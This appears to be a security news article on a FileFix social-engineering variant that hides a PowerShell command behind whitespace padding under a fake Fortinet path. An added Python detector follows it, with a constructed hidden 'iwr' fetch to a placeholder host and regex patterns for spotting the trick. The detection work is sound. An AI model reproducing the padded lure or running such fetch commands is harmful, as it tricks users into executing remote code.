A new variant of the FileFix social engineering attack uses cache smuggling to secretly download a malicious ZIP archive onto a victim's system and bypass security software.
The new phishing and social engineering attack impersonates a "Fortinet VPN Compliance Checker" and was first spotted by cybersecurity researcher P4nd3m1cb0y, who shared information about it on X.
In a new report by cybersecurity firm Expel, cybersecurity researcher Marcus Hutchins shares more details on how this attack works.
For those not familiar with FileFix attacks, they are a variant of the ClickFix social engineering attack, developed by Mr.d0x. Instead of tricking users into pasting malicious commands into operating system dialogs such as the Windows Run dialog, FileFix has them paste into the Windows File Explorer address bar, which then launches the PowerShell command without an obvious console window.
FileFix attack evolves with cache smuggling
In the new phishing attack, a website displays a dialog that poses as a Fortinet VPN "Compliance Checker," directing users to paste what looks like a legitimate network path to a Fortinet program on a network share.
Fortinet VPN Compliance Check FileFix lure
Source: Expel
While the lure displays the path "\\Public\Support\VPN\ForticlientCompliance.exe", the string actually placed on the clipboard is much longer: it is padded with 139 spaces that push a malicious PowerShell command out of view.
Because of this padding, when the visitor follows the instructions to open File Explorer and paste the clipboard contents into the address bar, only the path is visible in the bar, as seen below, while the PowerShell command sits outside the displayed portion.
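The whitespace padding is also the most distinctive artifact this technique leaves behind: the entire pasted string, spaces included, becomes the command line of the process that Explorer launches, so the same padding should show up in process-creation telemetry. The following Python triage script is an added example and not code from Expel, the researchers named above, or the campaign itself. The process-creation records are constructed for the example (modelled on Sysmon Event ID 1 fields), the download URL is a placeholder, and the layout of the padded string (command, then padding, then a "#" comment carrying the decoy path) is an assumption based on the original FileFix technique; the exact layout used by this campaign is not shown on this page.

```python
import re
from dataclasses import dataclass, field

# Constructed clipboard payload in the assumed FileFix layout: real command,
# then the 139-space padding the article describes, then a PowerShell comment
# holding the decoy path the victim sees. The URL is a placeholder.
PADDED_PASTE = (
    'powershell -w hidden -c "iwr https://lure.invalid/c"'
    + " " * 139
    + r"# \\Public\Support\VPN\ForticlientCompliance.exe"
)

# Constructed process-creation records modelled on Sysmon Event ID 1 fields.
# These are made-up samples for the example, not telemetry from the campaign.
SAMPLE_EVENTS = [
    {   # FileFix shape: Explorer launches PowerShell with a padded, commented command line
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": PADDED_PASTE,
    },
    {   # Benign: a user double-clicks a shortcut that runs a script
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -File C:\Tools\backup.ps1",
    },
    {   # Benign: service-launched PowerShell, long command line but no padding
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -Command Get-Process | Out-File C:\\log.txt",
    },
]

SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")
PAD_THRESHOLD = 20  # whitespace runs this long are not something a user types by hand
PAD_RUN = re.compile(r"[ \t]{%d,}" % PAD_THRESHOLD)
# A '#' comment whose text looks like a UNC or drive path: the decoy shown in the address bar
DECOY_COMMENT = re.compile(r"#\s*((?:\\\\|[A-Za-z]:\\)[^\s]+)")


@dataclass
class Finding:
    suspicious: bool
    reasons: list = field(default_factory=list)
    longest_pad: int = 0
    decoy_path: str = ""


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(ev: dict) -> Finding:
    """Score one process-creation record for the FileFix padded-paste pattern."""
    f = Finding(False)
    cmd = ev.get("CommandLine", "")

    # Explorer is the parent when a command is run from its address bar
    shell_from_explorer = (basename(ev.get("ParentImage", "")) == "explorer.exe"
                           and basename(ev.get("Image", "")) in SHELLS)
    if shell_from_explorer:
        f.reasons.append("shell spawned directly by explorer.exe")

    runs = PAD_RUN.findall(cmd)
    if runs:
        f.longest_pad = max(len(r) for r in runs)
        f.reasons.append(f"{f.longest_pad}-char whitespace run in command line")

    m = DECOY_COMMENT.search(cmd)
    if m:
        f.decoy_path = m.group(1)
        f.reasons.append(f"path-like text hidden in a comment: {f.decoy_path}")

    # Padding on its own is rare; padding plus a decoy path or an Explorer parent
    # is the shape described above. An Explorer parent alone is too noisy to alert on.
    f.suspicious = bool(runs) and (bool(m) or shell_from_explorer)
    return f


def scan(events):
    """Analyze a batch of records; returns one Finding per event, in order."""
    return [analyze_event(e) for e in events]


if __name__ == "__main__":
    for ev, f in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        status = "SUSPICIOUS" if f.suspicious else "ok"
        print(f"{status:10} {basename(ev['Image'])} | {'; '.join(f.reasons) or 'no indicators'}")
```

Only the first record is flagged; the benign Explorer-launched script trips the parent-process indicator alone, which the verdict deliberately treats as insufficient. In practice the same logic maps onto a SIEM query over process-creation events: parent explorer.exe, a shell image, and a command line containing a long whitespace run or a "#" followed by a path.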